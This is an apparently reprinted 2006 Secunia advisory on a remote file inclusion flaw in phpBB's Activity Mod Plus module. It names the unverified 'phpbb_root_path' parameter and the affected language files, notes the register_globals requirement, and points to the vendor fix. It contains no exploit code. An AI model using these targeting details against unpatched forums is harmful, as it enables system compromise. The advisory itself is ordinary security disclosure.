phpBB Activity Mod Plus Module phpbb_root_path File Inclusion Date: Wednesday, May 31, 2006 @ 07:24:11 CDT Topic: Security TITLE: phpBB Activity Mod Plus Module "phpbb_root_path" File Inclusion SECUNIA ADVISORY ID: SA20354 VERIFY ADVISORY: http://secunia.com/advisories/20354/ CRITICAL: Highly critical IMPACT: System access WHERE: >From remote SOFTWARE: Activity Mod Plus 1.x (module for phpBB) http://secunia.com/product/10213/ DESCRIPTION: Mustafa Can Bjorn has reported a vulnerability in the Activity Mod Plus module for phpBB, which can be exploited by malicious people to compromise a vulnerable system. Input passed to the "phpbb_root_path" parameter in "language/lang_english/lang_activity.php" isn't properly verified, before it is used to include files. This can be exploited to include arbitrary files from external and local resources. The "lang_activity_char.php" script is reportedly also affected. Successful exploitation requires that "register_globals" is enabled. SOLUTION: Apply code changes as instructed by the vendor. http://www.phpbb-amod.com/topics.html-t-2423 PROVIDED AND/OR DISCOVERED BY: Mustafa Can Bjorn ORIGINAL ADVISORY: http://www.nukedx.com/?viewdoc=38 This article comes from Ravens PHP Scripts https://www.ravenphpscripts.com The URL for this story is: https://www.ravenphpscripts.com/modules.php?name=News&file=article&sid=2197